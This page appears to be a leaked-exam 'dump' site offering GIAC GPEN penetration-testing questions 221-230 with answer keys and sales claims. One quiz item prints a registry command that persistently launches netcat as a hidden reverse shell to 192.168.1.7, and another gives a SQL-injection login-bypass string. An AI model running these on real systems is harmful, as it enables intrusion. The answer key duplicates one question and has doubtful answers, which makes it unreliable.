[Free] 2017(Sep) CollectDumps Dumpsleader GIAC GPEN Dumps with VCE and PDF 221-230

CollectDumps 2017 Sep GIAC Official New Released GPEN
100% Free Download! 100% Pass Guaranteed!
http://www.CollectDumps.com/GPEN.html

GIAC Penetration Tester

Question No: 221 – (Topic 3)

You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure. com network. Now, when you have finished your penetration testing, you find that the weare- secure.com server is highly vulnerable to SNMP enumeration. You advise the we-are-secure Inc. to turn off SNMP; however, this is not possible as the company is using various SNMP services on its remote nodes. What other step can you suggest to remove SNMP vulnerability?

Each correct answer represents a complete solution. Choose two.

  1. Change the default community string names.

  2. Install antivirus.

  3. Close port TCP 53.

  4. Upgrade SNMP Version 1 with the latest version.

Answer: A,D

Question No: 222 – (Topic 3)

You want to retrieve password files (stored in the Web server#39;s index directory) from various Web sites. Which of the following tools can you use to accomplish the task?

  1. Nmap

  2. Sam spade

  3. Whois

  4. Google

Answer: D

Question No: 223 – (Topic 3)

Which of the following laws or acts, formed in Australia, enforces prohibition against cyber stalking?

  1. Stalking Amendment Act (1999)

  2. Malicious Communications Act (1998)

  3. Anti-Cyber-Stalking law (1999)

  4. Stalking by Electronic Communications Act (2001)

Answer: A

Question No: 224 – (Topic 3)

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d quot;c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exequot;

What task do you want to perform by running this command?

Each correct answer represents a complete solution. Choose all that apply.

  1. You want to put Netcat in the stealth mode.

  2. You want to add the Netcat command to the Windows registry.

  3. You want to perform banner grabbing.

  4. You want to set the Netcat to execute command any time.

Answer: A,B,D

Question No: 225 – (Topic 3)

One of the sales people in your company complains that sometimes he gets a lot of unsolicited messages on his PDA. After asking a few questions, you determine that the issue only occurs in crowded areas like airports. What is the most likely problem?

  1. Blue snarfing

  2. Blue jacking

  3. A virus

  4. Spam

Answer: B

Question No: 226 – (Topic 3)

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. On the We-are-secure login page, he enters =#39;or#39;#39;=#39; as

a username and successfully logs in to the user page of the Web site. The We-are-secure login page is vulnerable to a .

  1. Replay attack

  2. Land attack

  3. SQL injection attack

  4. Dictionary attack

Answer: C

Question No: 227 – (Topic 3)

Which of the following tools automates password guessing in the NetBIOS session?

  1. L0phtCrack

  2. John the Ripper

  3. Legion

  4. NTInfoScan

Answer: C

Question No: 228 – (Topic 3)

Which of the following attacks allows an attacker to recover the key in an RC4 encrypted stream from a large number of messages in that stream?

  1. SYN flood attack

  2. Rainbow attack

  3. Zero Day attack

  4. FMS attack

Answer: D

Question No: 229 – (Topic 3)

Which of the following statements are true about session hijacking?

Each correct answer represents a complete solution. Choose all that apply.

  1. It is used to slow the working of victim#39;s network resources.

  2. TCP session hijacking is when a hacker takes over a TCP session between two machines.

  3. Use of a long random number or string as the session key reduces session hijacking.

  4. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.

Answer: B,C,D

Question No: 230 – (Topic 3)

Which of the following statements are true about session hijacking?

Each correct answer represents a complete solution. Choose all that apply.

  1. TCP session hijacking is when a hacker takes over a TCP session between two machines.

  2. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.

  3. Use of a long random number or string as the session key reduces session hijacking.

  4. It is used to slow the working of victim#39;s network resources.

Answer: A,B,C

100% Free Download!
Download Free Demo:GPEN Demo PDF
100% Pass Guaranteed!
Download 2017 CollectDumps GPEN Full Exam PDF and VCE

CollectDumps ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
PDF VCE Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No

2017 CollectDumps IT Certification PDF and VCE